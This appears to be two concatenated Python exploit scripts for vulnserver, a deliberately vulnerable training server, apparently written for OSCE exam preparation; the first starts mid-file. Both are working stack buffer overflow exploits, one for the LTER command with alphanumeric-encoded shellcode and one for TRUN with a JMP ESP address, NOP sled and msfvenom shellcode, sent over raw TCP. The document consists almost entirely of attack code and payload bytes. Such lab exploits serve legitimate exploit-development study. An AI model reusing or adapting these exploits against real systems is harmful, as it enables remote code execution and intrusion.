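    b"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
    b"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
    b"\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x7a\x48\x6f\x72\x35\x50"
    b"\x43\x30\x67\x70\x61\x70\x6b\x39\x5a\x45\x30\x31\x49\x50\x50"
    b"\x64\x4c\x4b\x32\x70\x66\x50\x6e\x6b\x70\x52\x76\x6c\x4e\x6b"
    b"\x50\x52\x66\x74\x6c\x4b\x34\x32\x31\x38\x34\x4f\x6f\x47\x70"
    b"\x4a\x31\x36\x55\x61\x4b\x4f\x6c\x6c\x75\x6c\x70\x61\x61\x6c"
    b"\x77\x72\x56\x4c\x75\x70\x79\x51\x38\x4f\x34\x4d\x66\x61\x78"
    b"\x47\x78\x62\x49\x62\x46\x32\x76\x37\x6e\x6b\x51\x42\x36\x70"
    b"\x6c\x4b\x72\x6a\x55\x6c\x6c\x4b\x42\x6c\x57\x61\x50\x78\x4a"
    b"\x43\x63\x78\x55\x51\x38\x51\x52\x71\x6e\x6b\x46\x39\x77\x50"
    b"\x66\x61\x39\x43\x6e\x6b\x77\x39\x66\x78\x6b\x53\x37\x4a\x71"
    b"\x59\x6c\x4b\x47\x44\x4c\x4b\x53\x31\x4a\x76\x70\x31\x59\x6f"
    b"\x4e\x4c\x7a\x61\x48\x4f\x74\x4d\x56\x61\x6a\x67\x46\x58\x6d"
    b"\x30\x52\x55\x6c\x36\x46\x63\x33\x4d\x5a\x58\x47\x4b\x53\x4d"
    b"\x35\x74\x74\x35\x5a\x44\x42\x78\x6c\x4b\x36\x38\x67\x54\x56"
    b"\x61\x6a\x73\x73\x56\x6e\x6b\x36\x6c\x62\x6b\x6c\x4b\x51\x48"
    b"\x77\x6c\x47\x71\x48\x53\x4c\x4b\x57\x74\x6c\x4b\x33\x31\x5a"
    b"\x70\x6b\x39\x30\x44\x55\x74\x71\x34\x51\x4b\x63\x6b\x75\x31"
    b"\x53\x69\x32\x7a\x42\x71\x79\x6f\x4b\x50\x71\x4f\x51\x4f\x52"
    b"\x7a\x6c\x4b\x77\x62\x68\x6b\x6e\x6d\x61\x4d\x33\x58\x75\x63"
    b"\x34\x72\x47\x70\x73\x30\x33\x58\x52\x57\x33\x43\x56\x52\x31"
    b"\x4f\x71\x44\x51\x78\x50\x4c\x61\x67\x66\x46\x76\x67\x49\x6f"
    b"\x48\x55\x4d\x68\x6a\x30\x46\x61\x35\x50\x35\x50\x36\x49\x48"
    b"\x44\x70\x54\x76\x30\x55\x38\x34\x69\x6b\x30\x50\x6b\x55\x50"
    b"\x49\x6f\x58\x55\x52\x4a\x37\x78\x56\x39\x30\x50\x68\x62\x79"
    b"\x6d\x71\x50\x32\x70\x77\x30\x56\x30\x51\x78\x5a\x4a\x54\x4f"
    b"\x69\x4f\x69\x70\x69\x6f\x48\x55\x4a\x37\x75\x38\x43\x32\x35"
    b"\x50\x54\x51\x63\x6c\x6c\x49\x58\x66\x71\x7a\x46\x70\x33\x66"
    b"\x76\x37\x42\x48\x78\x42\x49\x4b\x55\x67\x73\x57\x39\x6f\x38"
    b"\x55\x73\x67\x70\x68\x58\x37\x7a\x49\x65\x68\x59\x6f\x59\x6f"
    b"\x4b\x65\x70\x57\x51\x78\x64\x34\x5a\x4c\x67\x4b\x58\x61\x39"
    b"\x6f\x6e\x35\x43\x67\x4d\x47\x45\x38\x72\x55\x72\x4e\x42\x6d"
    b"\x70\x61\x4b\x4f\x6b\x65\x71\x78\x32\x43\x42\x4d\x55\x34\x37"
    b"\x70\x6e\x69\x6b\x53\x71\x47\x61\x47\x62\x77\x74\x71\x78\x76"
    b"\x73\x5a\x32\x32\x52\x79\x31\x46\x79\x72\x69\x6d\x62\x46\x59"
    b"\x57\x42\x64\x77\x54\x65\x6c\x53\x31\x55\x51\x4c\x4d\x47\x34"
    b"\x71\x34\x36\x70\x49\x56\x57\x70\x53\x74\x30\x54\x32\x70\x72"
    b"\x76\x63\x66\x33\x66\x71\x56\x56\x36\x70\x4e\x63\x66\x50\x56"
    b"\x31\x43\x42\x76\x35\x38\x43\x49\x38\x4c\x35\x6f\x4b\x36\x49"
    b"\x6f\x39\x45\x6e\x69\x39\x70\x52\x6e\x72\x76\x62\x66\x69\x6f"
    b"\x74\x70\x43\x58\x74\x48\x6b\x37\x67\x6d\x53\x50\x39\x6f\x7a"
    b"\x75\x6d\x6b\x38\x70\x68\x35\x6e\x42\x51\x46\x31\x78\x6d\x76"
    b"\x7a\x35\x6d\x6d\x6f\x6d\x79\x6f\x48\x55\x75\x6c\x65\x56\x43"
    b"\x4c\x46\x6a\x4f\x70\x59\x6b\x6b\x50\x63\x45\x66\x65\x4d\x6b"
    b"\x53\x77\x52\x33\x44\x32\x52\x4f\x61\x7a\x45\x50\x51\x43\x49"
    b"\x6f\x79\x45\x41\x41"
)

# 62501203 JMP ESP (presumably essfunc.dll, like the other 0x625xxxxx
# addresses).  Per the original note, LTER treats bytes in "79....FF" -
# presumably 0x80-0xFF - as bad, so the address bytes (03 12 50 62) all stay
# below 0x80 and the payload is alpha_mixed encoded for the same reason.
ret = b"\x03\x12\x50\x62"

# Layout after the 6-byte "LTER ." prefix: 'A' * 2006 | ret @2006 | buf
junk = b"LTER ." + b"\x41" * 2006 + ret + buf


def send_payload(target_host, target_port, data, timeout=10):
    """Open a TCP connection to target_host:target_port, send data, close it.

    sendall() replaces send(): send() may write only part of the buffer and
    the original never checked its return value.  The socket is closed in a
    finally block so a failed connect/send does not leak it.  Raises
    socket.error (OSError on Python 3) on connect/send failure.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # Fail fast against an unreachable lab target instead of hanging.
        sock.settimeout(timeout)
        sock.connect((target_host, target_port))
        sock.sendall(data)
    finally:
        sock.close()


if __name__ == "__main__":
    # Optional overrides: <script> [host] [port]; defaults keep the lab target.
    target_host = sys.argv[1] if len(sys.argv) > 1 else host
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else port
    send_payload(target_host, target_port, junk)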
#!/usr/bin/python
# vulnserver.exe TRUN BoF by r00tpgp
# 9/6/2018
# In preparation for CTP/OSCE
#
import socket
import os
import sys
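host = "172.16.155.133"
port = 9999

# 2003 bytes of 'A' reach the saved return address for TRUN.
junk1 = b"\x41" * 2003
# 0x625011AF JMP ESP
retn = b"\xAF\x11\x50\x62"

# msfvenom -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00' -f python
# 220-byte encoded payload.  Bytes literals (b"") are used throughout so the
# script also runs under Python 3, where a str payload raises TypeError in
# send() and an implicit encode would mangle every byte >= 0x80.
buf = (
    b"\xb8\xcb\xa5\x9b\x06\xdb\xc8\xd9\x74\x24\xf4\x5a\x2b"
    b"\xc9\xb1\x31\x83\xc2\x04\x31\x42\x0f\x03\x42\xc4\x47"
    b"\x6e\xfa\x32\x05\x91\x03\xc2\x6a\x1b\xe6\xf3\xaa\x7f"
    b"\x62\xa3\x1a\x0b\x26\x4f\xd0\x59\xd3\xc4\x94\x75\xd4"
    b"\x6d\x12\xa0\xdb\x6e\x0f\x90\x7a\xec\x52\xc5\x5c\xcd"
    b"\x9c\x18\x9c\x0a\xc0\xd1\xcc\xc3\x8e\x44\xe1\x60\xda"
    b"\x54\x8a\x3a\xca\xdc\x6f\x8a\xed\xcd\x21\x81\xb7\xcd"
    b"\xc0\x46\xcc\x47\xdb\x8b\xe9\x1e\x50\x7f\x85\xa0\xb0"
    b"\x4e\x66\x0e\xfd\x7f\x95\x4e\x39\x47\x46\x25\x33\xb4"
    b"\xfb\x3e\x80\xc7\x27\xca\x13\x6f\xa3\x6c\xf8\x8e\x60"
    b"\xea\x8b\x9c\xcd\x78\xd3\x80\xd0\xad\x6f\xbc\x59\x50"
    b"\xa0\x35\x19\x77\x64\x1e\xf9\x16\x3d\xfa\xac\x27\x5d"
    b"\xa5\x11\x82\x15\x4b\x45\xbf\x77\x01\x98\x4d\x02\x67"
    b"\x9a\x4d\x0d\xd7\xf3\x7c\x86\xb8\x84\x80\x4d\xfd\x7b"
    b"\xcb\xcc\x57\x14\x92\x84\xea\x79\x25\x73\x28\x84\xa6"
    b"\x76\xd0\x73\xb6\xf2\xd5\x38\x70\xee\xa7\x51\x15\x10"
    b"\x14\x51\x3c\x73\xfb\xc1\xdc\x5a\x9e\x61\x46\xa3"
)

# NOP pad between the JMP ESP landing point and the encoded payload, giving
# the shikata_ga_nai decoder some room on the stack.
NOPS = b"\x90" * 30

# Layout after the 9-byte "TRUN /.:/" prefix: 'A' * 2003 | retn @2003 | 30 NOPs | buf
junk = b"TRUN /.:/" + junk1 + retn + NOPS + buf


def send_payload(target_host, target_port, data, timeout=10):
    """Open a TCP connection to target_host:target_port, send data, close it.

    sendall() replaces send(): send() may write only part of the buffer and
    the original never checked its return value.  The socket is closed in a
    finally block so a failed connect/send does not leak it.  Raises
    socket.error (OSError on Python 3) on connect/send failure.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # Fail fast against an unreachable lab target instead of hanging.
        sock.settimeout(timeout)
        sock.connect((target_host, target_port))
        sock.sendall(data)
    finally:
        sock.close()


if __name__ == "__main__":
    # Optional overrides: <script> [host] [port]; defaults keep the lab target.
    target_host = sys.argv[1] if len(sys.argv) > 1 else host
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else port
    # As in the original, a second run of junk1 is appended as trailing filler.
    send_payload(target_host, target_port, junk + junk1)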